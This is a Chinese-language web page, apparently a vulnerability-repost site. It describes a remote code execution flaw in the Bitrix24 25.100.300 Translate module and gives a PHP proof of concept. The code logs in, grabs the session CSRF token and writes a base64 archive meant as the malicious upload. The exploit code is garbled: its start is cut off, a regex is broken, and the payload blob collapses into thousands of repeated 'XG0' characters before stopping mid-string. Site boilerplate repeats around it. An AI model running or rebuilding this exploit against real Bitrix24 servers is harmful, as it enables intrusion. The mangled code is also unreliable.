Bitrix24 Translate模块远程代码执行漏洞(CVE-2025-07)及POC

Bitrix24 远程代码执行漏洞 (CVE-2025-07) 漏洞概述 Bitrix24 25.100.300 (Translate Module) 存在远程代码执行漏洞。攻击者可以通过利用翻译模块中的文件上传和提取功能，上传恶意文件并执行任意代码。 影响范围 软件：Bitrix24 版本：25.100.300 模块：Translate Module 修复方案 更新 Bitrix24 到最新版本。 检查并修复翻译模块中的文件上传和提取功能，确保只允许上传和提取受信任的文件类型。 加强输入验证和输出编码，防止恶意文件上传和执行。 POC代码 ```php url\n'); $url = $argv[1]; $user = $argv[2]; $passd = $argv[3]; $ch = curl_init(); unlink('./.cookies.txt'); curl_setopt($ch, CURLOPT_HEADER, true); curl_setopt($ch, CURLOPT_COOKIEJAR, './.cookies.txt'); curl_setopt($ch, CURLOPT_COOKIEFILE, './.cookies.txt'); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); //curl_setopt($ch, CURLOPT_PROXY, 'http://127.0.0.1:8080'); print "[+] Logging into Bitrix\n"; curl_setopt($ch, CURLOPT_URL, "{$url}"); curl_setopt($ch, CURLOPT_POSTFIELDS, "AUTH_FORM=TYPE&AUTH_AUTH=Y&LOGIN[USER_LOGIN]={$user}&LOGIN[USER_PASSWORD]={$passd}"); if (!preg_match('/"BITRIX_SM_LOGIN", curl_exec($ch)) die('[-] Login failed!\n'); curl_setopt($ch, CURLOPT_POST, false); if (!preg_match('/"bitrix_sessid":"([a-z-]+)"/', curl_exec($ch), $csrff)) die('[-] CSRF token not found!\n'); print "[+] Uploading malicious archive\n"; while (!file_exists('./rc.tar.gz')) { file_put_contents('./rc.tar.gz', 'H4sIAAAAAAAAAAAAAAAACaW9QW8P7FJH+9W0q7TaftwH4XNcW4GZ2Nv1s8Z9XW0PFCXs752jYg7TXK3xv/xsFa0/gXQJ9XG01dK9XG0XKb4+6+Hef4XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0XG0X

目标达成感谢每一位支持者 — 我们达成了 100% 目标！

Bitrix24 Translate模块远程代码执行漏洞(CVE-2025-07)及POC

同源更多文章

目标达成 感谢每一位支持者 — 我们达成了 100% 目标！

Bitrix24 Translate模块远程代码执行漏洞(CVE-2025-07)及POC

同源更多文章

目标达成感谢每一位支持者 — 我们达成了 100% 目标！